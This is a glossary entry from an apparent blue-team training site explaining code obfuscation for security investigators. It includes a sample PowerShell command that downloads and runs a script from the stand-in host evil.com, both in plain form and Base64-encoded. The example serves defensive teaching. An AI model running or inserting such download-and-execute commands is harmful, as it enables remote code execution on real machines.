My Games
Account π
Sign Up
Login
Global Leaderboard
Case Vault
Badge Backpack
Blue Team Glossary
Login and start playing
Leaving so soon?
×
You really want to log out? We were having so much fun!
Home
βΊ
Glossary
βΊ
obfuscation
Obfuscation
Definition
Obfuscation is the practice of **deliberately making code, data, or communications harder to read or understand**. The purpose isnβt necessarily to encrypt or fully hide something β itβs to make analysis and detection more difficult. Both legitimate developers and malicious actors use obfuscation: * **Legitimate uses** β Protecting intellectual property in software, making reverse engineering harder. * **Malicious uses** β Hiding malware functionality, disguising malicious commands, bypassing security tools. Common obfuscation techniques in cyberattacks: * **String manipulation** β Breaking up suspicious words like `PowerShell` into pieces and reassembling them at runtime. * **Encoding** β Using Base64, hexadecimal, or other formats to hide payloads. * **Variable renaming** β Changing meaningful names into meaningless ones (`password` β `x7z_a`). * **Control flow alteration** β Adding junk code, fake branches, or loops to confuse analysts. * **Polyglot or nested scripts** β Embedding one script language inside another. Example β a malicious PowerShell command might be written as: ```powershell $cmd = "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/a.ps1')" ``` but obfuscated as: ```powershell powershell -enc SUVYIChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vZXZpbC5jb20vYS5wczEnKQ== ``` (Here, the payload is Base64-encoded to avoid detection.) Why it matters in investigations: * Obfuscation is a common sign of malicious intent in scripts, macros, and binaries. * Analysts often need to **de-obfuscate** the code to understand what it does. * Automated detection may fail if rules look only for clear-text indicators. Further reading: * MITRE ATT\&CK β Obfuscated Files or Information (T1027): [https://attack.mitre.org/techniques/T1027/](https://attack.mitre.org/techniques/T1027/) * SANS β Deobfuscation Techniques: [https://www.sans.org/blog/obfuscation-deobfuscation-in-malware-analysis/](https://www.sans.org/blog/obfuscation-deobfuscation-in-malware-analysis/) * OWASP β Code Obfuscation: [https://owasp.org/www-community/controls/Code\_Obfuscation](https://owasp.org/www-community/controls/Code_Obfuscation)
Explore More Terms
Processevents
Process_commandline
Pipe
Investigation
Reconnaissance